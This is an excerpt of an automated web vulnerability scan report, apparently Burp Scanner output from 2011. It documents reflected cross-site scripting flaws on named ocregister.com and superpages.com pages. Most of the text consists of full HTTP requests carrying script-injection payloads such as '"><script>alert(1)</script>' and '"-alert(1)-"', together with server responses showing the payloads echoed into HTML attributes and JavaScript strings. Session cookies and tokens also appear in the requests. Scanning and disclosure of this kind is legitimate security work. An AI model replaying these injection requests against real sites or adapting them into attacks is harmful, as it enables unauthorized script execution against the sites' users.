Date: Thu, 03 Feb 2011 19:06:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Eyeball ’11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks35fdf\"><script>alert(1)</script>012deb55675/eyeball-11/feed/" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1d12"><script>alert(1)</script>f582b534ec7 was submitted in the REST URL parameter 3. This input was echoed as f1d12\"><script>alert(1)</script>f582b534ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks/eyeball-11f1d12"><script>alert(1)</script>f582b534ec7/ HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11f1d12\"><script>alert(1)</script>f582b534ec7/feed/" /> ...[SNIP]...
1.191. http://lansner.ocregister.com/category/outlooks/eyeball-11/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://lansner.ocregister.com
Path:
/category/outlooks/eyeball-11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c705"><script>alert(1)</script>feb32e4d31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c705\"><script>alert(1)</script>feb32e4d31b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/outlooks/eyeball-11/?3c705"><script>alert(1)</script>feb32e4d31b=1 HTTP/1.1
Host: lansner.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lansner.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Eyeball ’11 - Lansner on Real Estate - www.ocregister.com" href="http://lansner.ocregister.com/category/outlooks/eyeball-11/?3c705\"><script>alert(1)</script>feb32e4d31b=1feed/" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6706"><script>alert(1)</script>6bccede39c1 was submitted in the REST URL parameter 4. This input was echoed as b6706\"><script>alert(1)</script>6bccede39c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/01/states-economic-rock-bottom-closer-than-everb6706"><script>alert(1)</script>6bccede39c1 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53243
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/01/states-economic-rock-bottom-closer-than-everb6706\"><script>alert(1)</script>6bccede39c1feed/" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b12b"><script>alert(1)</script>29a0ab24421 was submitted in the REST URL parameter 4. This input was echoed as 2b12b\"><script>alert(1)</script>29a0ab24421 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b"><script>alert(1)</script>29a0ab24421 HTTP/1.1
Host: letters.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... l="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b\"><script>alert(1)</script>29a0ab24421feed/" /> ...[SNIP]...
The value of the &SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0186"%3balert(1)//4a2e6a0ce5b was submitted in the &SRC parameter. This input was echoed as e0186";alert(1)//4a2e6a0ce5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1ae0186"%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=0A0D8557B1084404AFE23DD0AF0AF253; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:22:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... window.locale = 'en-us'; var token = "RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2";
var spHeader=false; var cobrand="comlocal1ae0186";alert(1)//4a2e6a0ce5b"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC="banks"; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; va ...[SNIP]...
The value of the spheader request parameter (named &spheader in the scanner output because the query string begins with a stray &) is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b305f"-alert(1)-"5b1a94486f6 was submitted in the spheader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6& HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=E5BF135AD9937E6B27515B002A95E5A6; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6&";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 415ee"%3balert(1)//7f39f412a8d was submitted in the C parameter. This input was echoed as 415ee";alert(1)//7f39f412a8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks415ee"%3balert(1)//7f39f412a8d&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=C1BB2C6D5F2026531BC42BC6B8F4DFAC; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:22:58 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... yFJXQWMj1bvQ2";
var spHeader=false; var cobrand="comlocal1a"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC="banks415ee";alert(1)//7f39f412a8d"; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; var spCampaignId2=""; var singleQuery2=""; var spType2=""; var spOnAMap2=null; var spC2=""; var spZoom=4; var spStyle="r"; var spD ...[SNIP]...
The value of the CS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5aa7"-alert(1)-"e8f7aa23d76 was submitted in the CS parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the L request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbefb"%3balert(1)//638e573e1c7 was submitted in the L parameter. This input was echoed as bbefb";alert(1)//638e573e1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101bbefb"%3balert(1)//638e573e1c7&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=0455C57151DFDC39EEC6EB920F1CE002; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... S2=false; var spLid2=""; var spBid2=""; var spCampaignId2=""; var singleQuery2=""; var spType2=""; var spOnAMap2=null; var spC2=""; var spZoom=4; var spStyle="r"; var spDD = false; var spAddress="19101bbefb";alert(1)//638e573e1c7"; var spStartAddress=""; var spTraffic = false; var spBeId = false; var spLat = null; var spLon = null; var spStartLocation = true;
var spc_lat = null; var spc_long = null; ...[SNIP]...
The value of the MCBP request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fed48"-alert(1)-"1cd3186e2fd was submitted in the MCBP parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=F434BBA89E81451FADCF2C4BAF96B9DD; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... eturning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the PS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242c7"-alert(1)-"6e00a234b00 was submitted in the PS parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=9139837C423FB41FB7994B9F30753C27; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:17 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... ed var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e454"%3balert(1)//a5898f77f83 was submitted in the SRC parameter. This input was echoed as 1e454";alert(1)//a5898f77f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&spheader=true&L=&SRC=bpo1e454"%3balert(1)//a5898f77f83 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=117A4533D55B610A1C95579E212D0972; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... window.locale = 'en-us'; var token = "p3QTbbHsCs-eeUFhvWJsTUVffL_Ir8TWNCsd-WpPTj7F6jKZTdTbkF_H-pfUpTkqszv1R7ui7FAHG-ONafiS_w2";
var spHeader=true; var cobrand="bpo1e454";alert(1)//a5898f77f83"; var spYPC=""; var spPGID=""; var spOF=""; var spLid=""; var spBid=""; var spCampaignId=""; var spOnAMap=false; var spC=""; var TopMostSW=false; var spMS2=false; var spLid2=""; var spBid2=""; var spC ...[SNIP]...
The value of the STYPE request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bc58"-alert(1)-"d4e5aaa0292 was submitted in the STYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=7AD460510827A183B38F52F6C40DBEE4; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
var fbClientId = "133515049997773";
</script> ...[SNIP]...
1.203. http://mapserver.superpages.com/mapbasedsearch/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mapserver.superpages.com
Path: /mapbasedsearch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 486fb"-alert(1)-"cf09a8c6088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=F0CC14DC558B2EE853A42B486D028978; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... var spc_long = null; // TEST: that this is returning what's expected var spReferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9334"-alert(1)-"340f60da8f8 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=48CA725AE0BF7A03BE6E941C2CF30885; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <meta http ...[SNIP]... ferer = false; var spDomain = "superpages.com";
var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8";
var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";
The value of the spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9124c"-alert(1)-"2c2736523e0 was submitted in the spheader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L= HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;
Response
HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=762E206D0334242828CD0BC99ACC410B; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:46 GMT
Connection: close
